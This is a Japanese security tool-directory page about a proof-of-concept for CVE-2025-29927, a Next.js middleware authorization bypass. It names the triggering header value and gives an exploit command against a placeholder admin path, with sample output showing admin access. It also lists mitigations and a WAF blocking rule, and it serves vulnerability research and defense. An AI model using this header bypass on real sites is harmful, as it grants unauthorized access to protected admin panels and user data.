Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29927-PoC — こちらは CVE-2025-29927 に対するシンプルだが効果的なエクスプロイトです。 | Kitploit
ツール/GitHubGitHub/w2hcorp/cve-2025-29927-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストレッドチーミング
GitHubw2hcorp/cve-2025-29927-poc

CVE-2025-29927-PoC

こちらは CVE-2025-29927 に対するシンプルだが効果的なエクスプロイトです。

リポジトリを見る
1131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29927 - Next.js ミドルウェア認可バイパス (PoC)

このリポジトリには、CVE-2025-29927 の概念実証 (PoC) エクスプロイトが含まれています。これは Next.js の深刻な脆弱性であり、攻撃者がミドルウェア固有のHTTPヘッダーを悪用して認可チェックをバイパスすることを可能にします。


概要

  • CVE ID: CVE-2025-29927
  • 重要度: 緊急 (CVSS 9.1)
  • 影響を受けるフレームワーク: Next.js
  • 脆弱性の種類: 認可バイパス
  • 攻撃経路: HTTPリクエストヘッダー
  • 悪用の複雑さ: 低
  • 認証の必要性: 不要

脆弱性について

Next.jsアプリケーションは、認可とアクセス制御のためにミドルウェアに依存することがよくあります。このCVEは、x-middleware-subrequestヘッダーの処理方法におけるロジックの欠陥に起因します。このヘッダーがmiddlewareに設定されている場合、サーバーはリクエストが内部ロジックから発信されたと誤って判断し、ミドルウェアベースの認可をバイパスする可能性があります。

これにより、攻撃者は認証情報や有効なセッションなしで、管理パネル、保護されたAPI、ユーザーデータにアクセスできる可能性があります。


PoCエクスプロイト

Next.jsアプリケーションが脆弱かどうかをテストするためのシンプルなPythonスクリプトを提供します。

▶️ 使い方

root@kitploit:~
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]

サンプル出力

root@kitploit:~
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...

依存関係

  • Python 3.6+
  • requestsライブラリ

緩和策

  • 最新のパッチ適用済みバージョンのNext.jsにアップグレードしてください。
  • x-middleware-subrequest を信頼シグナルとして使用しないでください。
  • 保護されたルートでサーバーサイドのセッション検証と適切な認可チェックを実装してください。
  • このヘッダーの不審な使用をブロックまたはフラグするために、WAF/IDSルールの追加を検討してください。

WAFロジック:

root@kitploit:~
if header 'x-middleware-subrequest' == 'middleware':
    block_request()

開示とクレジット

このPoCは、継続的な脆弱性調査活動の一環として、W2H Corp.のオフェンシブセキュリティチームによって開発されました。CVEの説明に関する元の投稿はこちらです。

ツールをダウンロード